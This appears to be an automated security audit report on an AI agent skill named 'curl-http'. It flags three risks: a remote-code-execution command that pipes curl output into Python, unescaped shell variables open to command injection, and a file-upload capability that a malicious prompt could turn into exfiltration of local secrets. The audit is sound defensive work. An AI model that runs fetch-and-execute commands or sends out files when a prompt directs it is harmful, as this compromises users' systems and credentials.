curl-http
Fail
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION] (HIGH): Automated scans identified a high-risk instruction in SKILL.md where output from a remote URL is piped directly to a Python interpreter (curl -s https://api.example.com | python). Piping untrusted web content into a shell or runtime environment is a major security vulnerability that can lead to full system compromise.
- [COMMAND_EXECUTION] (MEDIUM): The scripts 'api-tester.sh' and 'http-debug.sh' dynamically construct cURL commands using variables for the URL and data payload without any validation or escaping. This creates a surface for command injection if the input source is untrusted.
- [DATA_EXFILTRATION] (LOW): While the skill is intended for API testing, the capability to send arbitrary files via form upload (e.g., curl -F file=@path) and custom headers could be misused by a malicious prompt to exfiltrate local configuration files or sensitive tokens if the agent is directed to an attacker-controlled endpoint.
Recommendations
- HIGH: Downloads and executes remote code from: https://api.example.com - DO NOT USE without thorough review
- AI detected serious security threats